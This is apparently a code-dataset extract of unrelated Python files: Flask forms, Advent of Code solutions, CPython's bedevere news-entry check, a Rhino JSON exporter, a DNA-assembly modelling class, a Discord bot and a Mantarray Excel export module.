content
stringlengths 5
1.05M
|
|---|
############ Forms ############
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, TextAreaField
from wtforms.validators import DataRequired, Email, EqualTo, Length, Optional
############ Signup ############
class SignupForm(FlaskForm):
username = StringField(
'Username',
validators=[
DataRequired(),
Length(min=6, message='Username must be longer than 6 characters.')
]
)
password = PasswordField(
'Password',
validators=[
DataRequired(),
Length(min=8, message='Select a stronger password.')
]
)
confirm = PasswordField(
'Confirm your password',
validators=[
DataRequired(),
EqualTo('password', message='Passwords must match')
]
)
submit = SubmitField('Register')
############ Authentication ############
class LoginForm(FlaskForm):
username = StringField(
'Username',
validators=[DataRequired()]
)
password = PasswordField(
'Password',
validators=[DataRequired()]
)
submit = SubmitField('Authenticate')
############ Beam Terminal ############
class TerminalForm(FlaskForm):
terminal = StringField(
'Terminal',
validators=[DataRequired()]
)
############ Make ############
class MakeForm(FlaskForm):
title = StringField(
'Title',
validators=[DataRequired()]
)
protocol = TextAreaField(
'Protocol',
validators=[DataRequired()]
)
poi = TextAreaField(
'Persons of interest',
validators=[DataRequired()]
)
attachment = TextAreaField(
'Dossier attachments',
validators=[DataRequired()]
)
submit = SubmitField('Make')
############ Update ############
class UpdateForm(FlaskForm):
title = StringField(
'Title',
validators=[DataRequired()]
)
protocol = TextAreaField(
'Protocol',
validators=[DataRequired()]
)
poi = TextAreaField(
'Persons of interest',
validators=[DataRequired()]
)
attachment = TextAreaField(
'Dossier attachments',
validators=[DataRequired()]
)
submit = SubmitField('Update')
|
import sys
import unittest
def debug(arg):
#pass
print(arg)
def calculate(lines):
layer_length = 25 * 6
index = 0
minimum = 25*6 + 1
result = 0
while index < len(lines):
layer = lines[:layer_length]
debug(len(layer))
debug(layer.count('0'))
debug(layer.count('1'))
debug(layer.count('2'))
zeros = layer.count('0')
if zeros < minimum:
result = layer.count('1') * layer.count('2')
minimum = zeros
lines = lines[layer_length:]
debug(minimum)
return result
if __name__=='__main__':
line = sys.stdin.readline().strip()
debug(len(line))
print(calculate(line))
|
"""Check for a news entry."""
import functools
import pathlib
import re
import gidgethub.routing
from . import util
router = gidgethub.routing.Router()
create_status = functools.partial(util.create_status, 'bedevere/news')
BLURB_IT_URL = 'https://blurb-it.herokuapp.com'
BLURB_PYPI_URL = 'https://pypi.org/project/blurb/'
FILENAME_RE = re.compile(r"""# YYYY-mm-dd or YYYY-mm-dd-HH-MM-SS
\d{4}-\d{2}-\d{2}(?:-\d{2}-\d{2}-\d{2})?\.
(?:bpo|gh-issue)-\d+(?:,\d+)*\. # Issue number(s)
[A-Za-z0-9_=-]+\. # Nonce (URL-safe base64)
rst # File extension""",
re.VERBOSE)
SKIP_NEWS_LABEL = util.skip_label("news")
SKIP_LABEL_STATUS = create_status(util.StatusState.SUCCESS,
description='"skip news" label found')
HELP = f"""\
Every change to Python [requires a NEWS entry]\
(https://devguide.python.org/committing/#updating-news-and-what-s-new-in-python).
Please, add it using the [blurb_it]({BLURB_IT_URL}) Web app or the [blurb]\
({BLURB_PYPI_URL}) command-line tool."""
async def check_news(gh, pull_request, files=None):
"""Check for a news entry.
The routing is handled through the filepaths module.
"""
if not files:
files = await util.files_for_PR(gh, pull_request)
in_next_dir = file_found = False
for file in files:
if not util.is_news_dir(file['file_name']):
continue
in_next_dir = True
file_path = pathlib.PurePath(file['file_name'])
if len(file_path.parts) != 5: # Misc, NEWS.d, next, <subsection>, <entry>
continue
file_found = True
if FILENAME_RE.match(file_path.name) and len(file['patch']) >= 1:
status = create_status(util.StatusState.SUCCESS,
description='News entry found in Misc/NEWS.d')
break
else:
issue = await util.issue_for_PR(gh, pull_request)
if util.skip("news", issue):
status = SKIP_LABEL_STATUS
else:
if pull_request['author_association'] == 'NONE':
await gh.post(f"{pull_request['issue_url']}/comments",
data={'body': HELP})
if not in_next_dir:
description = f'No news entry in {util.NEWS_NEXT_DIR} or "skip news" label found'
elif not file_found:
description = "News entry not in an appropriate directory"
else:
description = "News entry file name incorrectly formatted"
status = create_status(util.StatusState.FAILURE,
description=description,
target_url=BLURB_IT_URL)
await gh.post(pull_request['statuses_url'], data=status)
@router.register('pull_request', action="labeled")
async def label_added(event, gh, *args, **kwargs):
if util.label_name(event.data) == SKIP_NEWS_LABEL:
await util.post_status(gh, event, SKIP_LABEL_STATUS)
@router.register("pull_request", action="unlabeled")
async def label_removed(event, gh, *args, **kwargs):
if util.no_labels(event.data):
return
elif util.label_name(event.data) == SKIP_NEWS_LABEL:
pull_request = event.data['pull_request']
await check_news(gh, pull_request)
|
# -*- coding: utf-8 -*-
"""Exports a json file with each json object containing the key/value pair of each object from selection."""
import rhinoscriptsyntax as rs
import trkRhinoPy as trp
import json
import ast
# objs = rs.GetObjects('select objects', rs.filter.polysurface, preselect=True)
objs = rs.GetObjects('select objects', preselect=True)
def createObjDict(obj):
# rs.SetUserText(obj, 'objdict')
objkeys = [ x for x in rs.GetUserText(obj) if "BakeName" not in x ]
objvals = map(lambda x: rs.GetUserText(obj, x), objkeys)
return dict(zip(objkeys, objvals))
# rs.SetUserText(obj, 'objdict', dict(zip(objkeys, objvals)))
dataStore = map(createObjDict, objs)
filter = "JSON File (*.json)|*.json|All Files (*.*)|*.*||"
filename = rs.SaveFileName("Save JSON file as", filter)
# If the file name exists, write a JSON string into the file.
if filename:
# Writing JSON data
with open(filename, 'w') as f:
json.dump(dataStore, f)
# def getObjDict(obj):
# userstr = rs.GetUserText(obj, "objdict")
# objdict = ast.literal_eval(userstr)
# return objdict
# def func(x):
# # trp.setValueByLayer(x,schema['keys'])
# # trp.setBrepHeight(x)
# # trp.setObjAreaValue(x)
# # createKVByVal(x, schema['skeys'], schema['svals'], schema['classkey'], schema['classvals'])
# # setObjDict(x)
# # trp.setSrfAreaValue(x)
# return getObjDict(x)
# objsList = map(func, objs)
# objsDict = {}
# objsDict['objs'] = objsList
# # print type(objsDict)
# # print objsDict['objs'][0]
# # print type(objsList[0])
# # print objsList[0]
# # print(len(objsDict['objs'][0]))
# filter = "JSON File (*.json)|*.json|All Files (*.*)|*.*||"
# filename = rs.SaveFileName("Save JSON file as", filter)
# # If the file name exists, write a JSON string into the file.
# if filename:
# # Writing JSON data
# with open(filename, 'w') as f:
# json.dump(objsDict, f)
|
# Copyright (c) 2019, Build-A-Cell. All rights reserved.
# See LICENSE file in the project root directory for details.
from .component import Component
from .components_basic import DNA, RNA, Protein
from .chemical_reaction_network import ComplexSpecies, Species
from .mechanisms_binding import One_Step_Cooperative_Binding, Combinatorial_Cooperative_Binding
from warnings import warn as pywarn
import itertools as it
import numpy as np
from .dna_assembly_promoter import *
from .dna_assembly_rbs import *
def warn(txt):
pywarn(txt)
class DNAassembly(DNA):
def __init__(self, name: str, dna = None, promoter = None, transcript = None,
rbs = None, protein = None, length = None,
attributes = [], mechanisms = {}, parameters = {}, initial_conc = None,
parameter_warnings = True, **keywords):
self.promoter = None
self.rbs = None
self.transcript = None
self.initial_concentration = initial_conc
self.name = name
DNA.__init__(self, name, length = length, mechanisms = mechanisms,
parameters = parameters, initial_conc = initial_conc,
parameter_warnings = parameter_warnings,
attributes = list(attributes), **keywords)
self.update_dna(dna, attributes = list(attributes))
self.update_transcript(transcript)
self.update_protein(protein)
self.update_promoter(promoter, transcript = self.transcript)
self.update_rbs(rbs, transcript = self.transcript,
protein = self.protein)
self.set_parameter_warnings(parameter_warnings)
def set_parameter_warnings(self, parameter_warnings):
self.parameter_warnings = parameter_warnings
if self.parameter_warnings is not None:
if self.promoter is not None:
self.promoter.set_parameter_warnings(parameter_warnings)
if self.rbs is not None:
self.rbs.set_parameter_warnings(parameter_warnings)
def update_dna(self, dna, attributes = None):
if dna is None:
self.dna = self.set_species(self.name, material_type = "dna", attributes = attributes)
else:
self.dna = self.set_species(dna, material_type = "dna", attributes = attributes)
def update_transcript(self, transcript, attributes = None):
if transcript is None:
self.transcript = self.set_species(self.name, material_type = "rna", attributes = attributes)
else:
self.transcript = self.set_species(transcript, material_type = "rna", attributes = attributes)
if self.promoter is not None:
self.promoter.transcript = self.transcript
if self.rbs is not None:
self.rbs.transcript = self.transcript
def update_protein(self, protein, attributes = None):
if protein is None:
self._protein = self.set_species(self.name, material_type = "protein", attributes = attributes)
else:
self._protein = self.set_species(protein, material_type = "protein", attributes = attributes)
if self.rbs is not None:
self.rbs.transcript = self.protein
def update_promoter(self, promoter, transcript=None):
if transcript is not None:
self.update_transcript(transcript)
if isinstance(promoter, str):
self.promoter = Promoter(assembly = self, name = promoter,
transcript = self.transcript,
parameters = self.parameters)
elif isinstance(promoter, Promoter):
self.promoter = promoter
self.promoter.assembly = self
self.promoter.transcript = self.transcript
elif promoter is not None:
raise ValueError("Improper promoter type recieved by DNAassembly. "
"Expected string or promoter object. "
f"Recieved {repr(promoter)}.")
if promoter is not None:
self.promoter.update_parameters(
mixture_parameters = self.parameters,
overwrite_custom_parameters = False)
def update_rbs(self, rbs, transcript = None, protein = None):
if protein is not None:
self.update_protein(protein)
if transcript is not None:
self.update_transcript(transcript)
if isinstance(rbs, str):
self.rbs = RBS(assembly = self, name = rbs, protein = self._protein,
transcript = self.transcript,
parameters = self.parameters)
elif isinstance(rbs, RBS):
self.rbs = rbs
self.rbs.assembly = self
self.rbs.transcript = self.transcript
self.rbs.protein = self._protein
elif rbs is not None:
raise ValueError("Improper rbs type recieved by DNAassembly. "
"Expected string or RBS object. Recieved "
f"{repr(rbs)}.")
if rbs is not None:
self.rbs.update_parameters(mixture_parameters = self.parameters,
overwrite_custom_parameters = False)
@property
def protein(self):
return self._protein
def update_species(self):
species = []
species.append(self.dna)
if self.promoter is not None and self.rbs is not None:
species += self.promoter.update_species()
species += self.rbs.update_species()
elif self.promoter is not None and self.rbs is None:
species += self.promoter.update_species()
if "rna_degredation" in self.mechanisms and self.promoter is not None:
deg_mech = self.mechanisms["rna_degredation"]
species += deg_mech.update_species(rna = self.transcript, component = self.promoter, part_id = self.transcript.name)
# TODO raise a warning if there were duplicate species
return list(set(species))
def update_reactions(self):
reactions = []
if self.promoter is not None:
self.promoter.parameter_warnings = self.parameter_warnings
reactions += self.promoter.update_reactions()
if self.rbs is not None:
self.rbs.parameter_warnings = self.parameter_warnings
reactions += self.rbs.update_reactions()
if "rna_degredation" in self.mechanisms and self.promoter is not None:
deg_mech = self.mechanisms["rna_degredation"]
reactions += deg_mech.update_reactions(rna = self.transcript, component = self.promoter, part_id = self.transcript.name)
# TODO check that the reaction list is unique
return reactions
def update_parameters(self, mixture_parameters = {}, parameters = {},
overwrite_custom_parameters = True):
DNA.update_parameters(self = self,
mixture_parameters = mixture_parameters,
parameters = parameters,
overwrite_custom_parameters = overwrite_custom_parameters)
if self.promoter is not None:
self.promoter.update_parameters(
mixture_parameters = mixture_parameters,
parameters = parameters,
overwrite_custom_parameters = overwrite_custom_parameters)
if self.rbs is not None:
self.rbs.update_parameters(mixture_parameters = mixture_parameters,
parameters = parameters,
overwrite_custom_parameters = overwrite_custom_parameters)
def update_mechanisms(self, mixture_mechanisms = {}, mechanisms = {},
overwrite_custom_mechanisms = False):
DNA.update_mechanisms(self = self,
mixture_mechanisms = mixture_mechanisms,
mechanisms = mechanisms)
if self.promoter is not None and "transcription" in self.mechanisms:
mech_tx = self.mechanisms["transcription"]
mechs = {"transcription": mech_tx}
self.promoter.update_mechanisms(mechanisms = mechs,
overwrite_custom_mechanisms = overwrite_custom_mechanisms)
if self.rbs is not None and "translation" in self.mechanisms:
mech_tl = self.mechanisms["translation"]
mechs = {"translation": mech_tl}
self.rbs.update_mechanisms(mechanisms = mechs,
overwrite_custom_mechanisms = overwrite_custom_mechanisms)
def __str__(self):
return type(self).__name__ + ": " + self.name
def __repr__(self):
txt = str(self)
if self.promoter is not None:
txt += "\n\t" + repr(self.promoter)
txt += "\n\ttranscript = " + repr(self.transcript)
if self.rbs is not None:
txt += "\n\t" + repr(self.rbs)
txt += "\n\tprotein = " + repr(self._protein)
return txt
|
import discord
import time
import birb_token as token
from discord import embeds
from discord.ext import commands
from discord.flags import alias_flag_value
from cogs import bsc_cmd
client = commands.Bot(command_prefix='\'')
c = '```'
#erase default !help command
client.remove_command('help')
#load bsc_cmd cog
client.load_extension('cogs.bsc_cmd')
wait = time.sleep(.5)
#on_Ready
@client.event
async def on_ready():
wait
await client.change_presence(
status=discord.Status.online,
activity=discord.Game('Professor Birb | Get \'help'))
print('BOT IS READY!')
#HELP COMMAND: Configurations
@client.command(aliases=['HELP', 'Help'])
async def help(ctx):
embed_help = discord.Embed(title="Professor Birb Commands",
description="All things that I can do, Chirp!",
color=0x00ffbf)
embed_help.add_field(name="'help",
value="All list of commands",
inline=True)
embed_help.add_field(name="'calc",
value="Calculates given equation.",
inline=True)
embed_help.add_field(name="'sqrt",
value="Square root of a number",
inline=True)
embed_help.add_field(name="'sq",
value="Get the square of a number",
inline=True)
embed_help.set_footer(icon_url=ctx.author.avatar_url,
text="Written using python language")
wait
await ctx.send(embed=embed_help)
client.run(token.TOKEN)
|
from utils.solution_base import SolutionBase
class Solution(SolutionBase):
keys = ["byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid", "cid"]
def solve(self, part_num: int):
self.test_runner(part_num)
func = getattr(self, f"part{part_num}")
result = func(self.data)
return result
def test_runner(self, part_num):
test_inputs = self.get_test_input()
test_results = self.get_test_result(part_num)
test_counter = 1
func = getattr(self, f"part{part_num}")
for i, r in zip(test_inputs, test_results):
if func(i) == int(r[0]):
print(f"test {test_counter} passed")
else:
print(f"test {test_counter} NOT passed")
test_counter += 1
print()
def part1(self, data):
return max(self.__get_all_seat_id(data))
def part2(self, data):
seats = ["0"] * 8 * 128
for i in self.__get_all_seat_id(data):
seats[i] = "1"
return "".join(seats).index("101") + 1
def __get_all_seat_id(self, b_pass_all):
return [self.__get_seat_id(b_pass) for b_pass in b_pass_all]
def __get_seat_id(self, b_pass):
rows, cols = b_pass[:7], b_pass[7:]
row_range = [0, 127]
col_range = [0, 7]
row = [self.__shrink_range(row_range, type) for type in rows][0][0]
col = [self.__shrink_range(col_range, type) for type in cols][0][0]
return row * 8 + col
def __shrink_range(self, pos_range, type):
if type in ["F", "L"]:
pos_range[1] = pos_range[0] + (pos_range[1] - pos_range[0]) // 2
elif type in ["B", "R"]:
pos_range[0] = (sum(pos_range) + 1) // 2
return pos_range
|
# -*- coding: utf-8 -*-
"""Docstring."""
import datetime
import logging
import math
import os
import tempfile
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
from typing import Union
import uuid
from uuid import UUID
import zipfile
from mantarray_file_manager import MAIN_FIRMWARE_VERSION_UUID
from mantarray_file_manager import MANTARRAY_SERIAL_NUMBER_UUID
from mantarray_file_manager import METADATA_UUID_DESCRIPTIONS
from mantarray_file_manager import PLATE_BARCODE_UUID
from mantarray_file_manager import PlateRecording as FileManagerPlateRecording
from mantarray_file_manager import SOFTWARE_BUILD_NUMBER_UUID
from mantarray_file_manager import SOFTWARE_RELEASE_VERSION_UUID
from mantarray_file_manager import UTC_BEGINNING_RECORDING_UUID
from mantarray_file_manager import WellFile
from mantarray_waveform_analysis import AMPLITUDE_UUID
from mantarray_waveform_analysis import CENTIMILLISECONDS_PER_SECOND
from mantarray_waveform_analysis import CONTRACTION_TIME_UUID
from mantarray_waveform_analysis import CONTRACTION_VELOCITY_UUID
from mantarray_waveform_analysis import IRREGULARITY_INTERVAL_UUID
from mantarray_waveform_analysis import Pipeline
from mantarray_waveform_analysis import PipelineTemplate
from mantarray_waveform_analysis import RELAXATION_TIME_UUID
from mantarray_waveform_analysis import RELAXATION_VELOCITY_UUID
from mantarray_waveform_analysis import TIME_DIFFERENCE_UUID
from mantarray_waveform_analysis import TooFewPeaksDetectedError
from mantarray_waveform_analysis import TWITCH_FREQUENCY_UUID
from mantarray_waveform_analysis import TWITCH_PERIOD_UUID
from mantarray_waveform_analysis import TwoPeaksInARowError
from mantarray_waveform_analysis import TwoValleysInARowError
from mantarray_waveform_analysis import WIDTH_FALLING_COORDS_UUID
from mantarray_waveform_analysis import WIDTH_RISING_COORDS_UUID
from mantarray_waveform_analysis import WIDTH_UUID
from mantarray_waveform_analysis import WIDTH_VALUE_UUID
from mantarray_waveform_analysis.exceptions import PeakDetectionError
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
from nptyping import NDArray
import numpy as np
from scipy import interpolate
from stdlib_utils import configure_logging
import xlsxwriter
from xlsxwriter import Workbook
from xlsxwriter.format import Format
from xlsxwriter.utility import xl_col_to_name
from .constants import AGGREGATE_METRICS_SHEET_NAME
from .constants import ALL_FORMATS
from .constants import CALCULATED_METRIC_DISPLAY_NAMES
from .constants import CHART_FIXED_WIDTH
from .constants import CHART_FIXED_WIDTH_CELLS
from .constants import CHART_HEIGHT
from .constants import CHART_HEIGHT_CELLS
from .constants import CHART_WINDOW_NUM_SECONDS
from .constants import CONTINUOUS_WAVEFORM_SHEET_NAME
from .constants import CONTRACTION_COORDINATES_DISPLAY_NAMES
from .constants import CONTRACTION_TIME_DIFFERENCE_DISPLAY_NAMES
from .constants import DEFAULT_CELL_WIDTH
from .constants import FORCE_FREQUENCY_RELATIONSHIP_SHEET
from .constants import FULL_CHART_SHEET_NAME
from .constants import INTERPOLATED_DATA_PERIOD_CMS
from .constants import INTERPOLATED_DATA_PERIOD_SECONDS
from .constants import METADATA_EXCEL_SHEET_NAME
from .constants import METADATA_INSTRUMENT_ROW_START
from .constants import METADATA_OUTPUT_FILE_ROW_START
from .constants import METADATA_RECORDING_ROW_START
from .constants import MICRO_TO_BASE_CONVERSION
from .constants import MICROSECONDS_PER_CENTIMILLISECOND
from .constants import NUMBER_OF_PER_TWITCH_METRICS
from .constants import PACKAGE_VERSION
from .constants import PEAK_VALLEY_COLUMN_START
from .constants import PER_TWITCH_METRICS_SHEET_NAME
from .constants import RELAXATION_COORDINATES_DISPLAY_NAMES
from .constants import RELAXATION_TIME_DIFFERENCE_DISPLAY_NAMES
from .constants import SECONDS_PER_CELL
from .constants import SNAPSHOT_CHART_SHEET_NAME
from .constants import TSP_TO_DEFAULT_FILTER_UUID
from .constants import TWENTY_FOUR_WELL_PLATE
from .constants import TWITCH_FREQUENCIES_CHART_SHEET_NAME
from .constants import TWITCH_WIDTH_METRIC_DISPLAY_NAMES
from .excel_well_file import ExcelWellFile
logger = logging.getLogger(__name__)
configure_logging(logging_format="notebook")
def _write_per_twitch_metric_labels(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
twitch_width_values: Tuple[int, ...],
twitch_coordinate_values: Tuple[int, ...],
twitch_time_diff_values: Tuple[int, ...],
) -> int:
for iter_metric_uuid, iter_metric_name in CALCULATED_METRIC_DISPLAY_NAMES.items():
if iter_metric_uuid == TIME_DIFFERENCE_UUID:
continue
curr_sheet.write(curr_row, 0, iter_metric_name)
curr_row += 1
for iter_width_percent, iter_metric_name in TWITCH_WIDTH_METRIC_DISPLAY_NAMES.items():
if iter_width_percent in twitch_width_values:
curr_sheet.write(curr_row, 0, iter_metric_name)
curr_row += 1
for iter_width_percent, iter_metric_name in CONTRACTION_COORDINATES_DISPLAY_NAMES.items():
if iter_width_percent in twitch_coordinate_values:
curr_sheet.write(curr_row, 0, f"{iter_metric_name} (seconds)")
curr_row += 1
curr_sheet.write(curr_row, 0, f"{iter_metric_name} (μN)")
curr_row += 1
for iter_width_percent, iter_metric_name in RELAXATION_COORDINATES_DISPLAY_NAMES.items():
if iter_width_percent in twitch_coordinate_values:
curr_sheet.write(curr_row, 0, f"{iter_metric_name} (seconds)")
curr_row += 1
curr_sheet.write(curr_row, 0, f"{iter_metric_name} (μN)")
curr_row += 1
for iter_width_percent, iter_metric_name in CONTRACTION_TIME_DIFFERENCE_DISPLAY_NAMES.items():
if iter_width_percent in twitch_time_diff_values:
curr_sheet.write(curr_row, 0, iter_metric_name)
curr_row += 1
for iter_width_percent, iter_metric_name in RELAXATION_TIME_DIFFERENCE_DISPLAY_NAMES.items():
if iter_width_percent in twitch_time_diff_values:
curr_sheet.write(curr_row, 0, iter_metric_name)
curr_row += 1
return curr_row
def _write_per_twitch_metric_values(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
per_twitch_dict: Dict[
int,
Dict[
UUID,
Union[
Dict[int, Dict[UUID, Union[Tuple[int, int], int]]],
Union[float, int],
],
],
],
number_twitches: int,
twitch_width_values: Tuple[int, ...],
twitch_coordinate_values: Tuple[int, ...],
force_minimum_value: float,
twitch_time_diff_values: Tuple[int, ...],
) -> int:
for iter_twitch_index in range(number_twitches):
curr_sheet.write(curr_row, iter_twitch_index + 1, f"Twitch {iter_twitch_index + 1}")
curr_row += 1
twitch_timepoints = list(per_twitch_dict)
for iter_twitch_index in range(number_twitches):
curr_sheet.write(
curr_row,
iter_twitch_index + 1,
twitch_timepoints[iter_twitch_index] / CENTIMILLISECONDS_PER_SECOND,
)
curr_row += 1
for iter_metric_uuid, _ in CALCULATED_METRIC_DISPLAY_NAMES.items():
if iter_metric_uuid == TIME_DIFFERENCE_UUID:
continue
for iter_twitch_index in range(number_twitches):
timepoint = twitch_timepoints[iter_twitch_index]
value_to_write = per_twitch_dict[timepoint][iter_metric_uuid]
if iter_metric_uuid == AMPLITUDE_UUID:
if not isinstance(value_to_write, float):
raise NotImplementedError(f"The value under key {AMPLITUDE_UUID} must be a float.")
value_to_write *= MICRO_TO_BASE_CONVERSION
if iter_metric_uuid in (TWITCH_PERIOD_UUID, IRREGULARITY_INTERVAL_UUID):
value_to_write /= CENTIMILLISECONDS_PER_SECOND
if iter_metric_uuid in (CONTRACTION_VELOCITY_UUID, RELAXATION_VELOCITY_UUID):
value_to_write *= CENTIMILLISECONDS_PER_SECOND * MICRO_TO_BASE_CONVERSION
try:
curr_sheet.write(curr_row, iter_twitch_index + 1, value_to_write)
except TypeError:
pass
curr_row += 1
new_row = _write_twitch_width_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_width_values,
)
curr_row = new_row
new_row = _write_twitch_coordinate_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_coordinate_values,
True,
force_minimum_value,
)
curr_row = new_row
new_row = _write_twitch_coordinate_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_coordinate_values,
False,
force_minimum_value,
)
curr_row = new_row
new_row = _write_twitch_time_diff_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_time_diff_values,
True,
)
curr_row = new_row
new_row = _write_twitch_time_diff_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_time_diff_values,
False,
)
curr_row = new_row
n_display_names = len(CALCULATED_METRIC_DISPLAY_NAMES)
if TIME_DIFFERENCE_UUID in CALCULATED_METRIC_DISPLAY_NAMES:
n_display_names -= 1
curr_row += (
-2
- n_display_names
- len(twitch_width_values)
- (4 * len(twitch_coordinate_values))
- (2 * len(twitch_time_diff_values))
) # revert back to initial row (number of metrics + 1)
return curr_row
def _write_twitch_time_diff_values(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
per_twitch_dict: Dict[
int,
Dict[
UUID,
Union[
Dict[int, Dict[UUID, Union[Tuple[int, int], int]]],
Union[float, int],
],
],
],
number_twitches: int,
twitch_time_diff_values: Tuple[int, ...],
is_contraction: bool,
) -> int:
if is_contraction:
display_names = CONTRACTION_TIME_DIFFERENCE_DISPLAY_NAMES
coord_uuid = WIDTH_RISING_COORDS_UUID
else:
display_names = RELAXATION_TIME_DIFFERENCE_DISPLAY_NAMES
coord_uuid = WIDTH_FALLING_COORDS_UUID
twitch_timepoints = list(per_twitch_dict)
for iter_width_percent, _ in display_names.items():
if iter_width_percent in twitch_time_diff_values:
for iter_twitch_index in range(number_twitches):
timepoint = twitch_timepoints[iter_twitch_index]
value_to_write = per_twitch_dict[timepoint][WIDTH_UUID]
if not isinstance(value_to_write, dict):
raise NotImplementedError(
f"The width value under key {WIDTH_VALUE_UUID} must be a dictionary."
)
coordinates = value_to_write[iter_width_percent][coord_uuid]
if not isinstance(coordinates, tuple):
raise NotImplementedError(f"The coordinate value under key {coord_uuid} must be a tuple.")
x_value: float
x_value, _ = coordinates
if is_contraction:
x_value = (timepoint - x_value) / CENTIMILLISECONDS_PER_SECOND
else:
x_value = (x_value - timepoint) / CENTIMILLISECONDS_PER_SECOND
x_value = round(x_value, 5)
curr_sheet.write(curr_row, iter_twitch_index + 1, x_value)
curr_row += 1
return curr_row
def _write_twitch_width_values(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
per_twitch_dict: Dict[
int,
Dict[
UUID,
Union[
Dict[int, Dict[UUID, Union[Tuple[int, int], int]]],
Union[float, int],
],
],
],
number_twitches: int,
twitch_width_values: Tuple[int, ...],
) -> int:
twitch_timepoints = list(per_twitch_dict)
for iter_width_percent, _ in TWITCH_WIDTH_METRIC_DISPLAY_NAMES.items():
if iter_width_percent in twitch_width_values:
for iter_twitch_index in range(number_twitches):
timepoint = twitch_timepoints[iter_twitch_index]
value_to_write = per_twitch_dict[timepoint][WIDTH_UUID]
if not isinstance(value_to_write, dict):
raise NotImplementedError(
f"The width value under key {WIDTH_VALUE_UUID} must be a dictionary."
)
width_val = (
value_to_write[iter_width_percent][WIDTH_VALUE_UUID] / CENTIMILLISECONDS_PER_SECOND
)
width_val = round(width_val, 5)
curr_sheet.write(curr_row, iter_twitch_index + 1, width_val)
curr_row += 1
return curr_row
def _write_twitch_coordinate_values(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
per_twitch_dict: Dict[
int,
Dict[
UUID,
Union[
Dict[int, Dict[UUID, Union[Tuple[int, int], int]]],
Union[float, int],
],
],
],
number_twitches: int,
twitch_coordinate_values: Tuple[int, ...],
is_contraction: bool,
force_minimum_value: float,
) -> int:
if is_contraction:
display_names = CONTRACTION_COORDINATES_DISPLAY_NAMES
coord_uuid = WIDTH_RISING_COORDS_UUID
else:
display_names = RELAXATION_COORDINATES_DISPLAY_NAMES
coord_uuid = WIDTH_FALLING_COORDS_UUID
twitch_timepoints = list(per_twitch_dict)
for iter_width_percent, _ in display_names.items():
if iter_width_percent in twitch_coordinate_values:
for iter_twitch_index in range(number_twitches):
timepoint = twitch_timepoints[iter_twitch_index]
value_to_write = per_twitch_dict[timepoint][WIDTH_UUID]
if not isinstance(value_to_write, dict):
raise NotImplementedError(
f"The width value under key {WIDTH_VALUE_UUID} must be a dictionary."
)
coordinates = value_to_write[iter_width_percent][coord_uuid]
if not isinstance(coordinates, tuple):
raise NotImplementedError(f"The coordinate value under key {coord_uuid} must be a tuple.")
y_value: float
x_value: float
x_value, y_value = coordinates
x_value /= CENTIMILLISECONDS_PER_SECOND
x_value = round(x_value, 5)
y_value *= MICRO_TO_BASE_CONVERSION
y_value -= force_minimum_value
curr_sheet.write(curr_row, iter_twitch_index + 1, x_value)
curr_row += 1
curr_sheet.write(curr_row, iter_twitch_index + 1, y_value)
curr_row -= 1
curr_row += 2
return curr_row
def _write_xlsx_device_metadata(
curr_sheet: xlsxwriter.worksheet.Worksheet, first_well_file: WellFile
) -> None:
curr_row = METADATA_INSTRUMENT_ROW_START
curr_sheet.write(curr_row, 0, "Device Information:")
curr_row += 1
curr_sheet.write(curr_row, 1, "H5 File Layout Version")
curr_sheet.write(curr_row, 2, first_well_file.get_h5_attribute("File Format Version"))
curr_row += 1
meta_data = (
(MANTARRAY_SERIAL_NUMBER_UUID, first_well_file.get_mantarray_serial_number()),
(SOFTWARE_RELEASE_VERSION_UUID, first_well_file.get_h5_attribute(str(SOFTWARE_RELEASE_VERSION_UUID))),
(SOFTWARE_BUILD_NUMBER_UUID, first_well_file.get_h5_attribute(str(SOFTWARE_BUILD_NUMBER_UUID))),
(MAIN_FIRMWARE_VERSION_UUID, first_well_file.get_h5_attribute(str(MAIN_FIRMWARE_VERSION_UUID))),
)
for iter_row, (iter_metadata_uuid, iter_value) in enumerate(meta_data):
row_in_sheet = curr_row + iter_row
curr_sheet.write(row_in_sheet, 1, METADATA_UUID_DESCRIPTIONS[iter_metadata_uuid])
curr_sheet.write(row_in_sheet, 2, iter_value)
def _write_xlsx_output_format_metadata(
curr_sheet: xlsxwriter.worksheet.Worksheet,
) -> None:
curr_row = METADATA_OUTPUT_FILE_ROW_START
curr_sheet.write(curr_row, 0, "Output Format:")
curr_row += 1
curr_sheet.write(curr_row, 1, "SDK Version")
curr_sheet.write(curr_row, 2, PACKAGE_VERSION)
curr_row += 1
curr_sheet.write(curr_row, 1, "File Creation Timestamp")
curr_sheet.write(curr_row, 2, datetime.datetime.utcnow().replace(microsecond=0))
def _write_xlsx_recording_metadata(
curr_sheet: xlsxwriter.worksheet.Worksheet, first_well_file: WellFile
) -> None:
curr_sheet.write(METADATA_RECORDING_ROW_START, 0, "Recording Information:")
meta_data = (
(PLATE_BARCODE_UUID, first_well_file.get_plate_barcode()),
(UTC_BEGINNING_RECORDING_UUID, first_well_file.get_begin_recording()),
)
for iter_row, (iter_metadata_uuid, iter_value) in enumerate(meta_data):
row_in_sheet = METADATA_RECORDING_ROW_START + 1 + iter_row
curr_sheet.write(row_in_sheet, 1, METADATA_UUID_DESCRIPTIONS[iter_metadata_uuid])
if isinstance(iter_value, datetime.datetime):
# Excel doesn't support timezones in datetimes
iter_value = iter_value.replace(tzinfo=None)
# Excel also doesn't support precision below millisecond, so chopping off any microseconds.
# Apparently rounding instead of flooring can cause funky issues if it rolls over into a new
# actual 'second' unit, so just flooring. https://stackoverflow.com/questions/11040177/datetime-round-trim-number-of-digits-in-microseconds
# pylint:disable=c-extension-no-member
iter_value = iter_value.replace(microsecond=math.floor(iter_value.microsecond / 1000) * 1000)
curr_sheet.write(row_in_sheet, 2, iter_value)
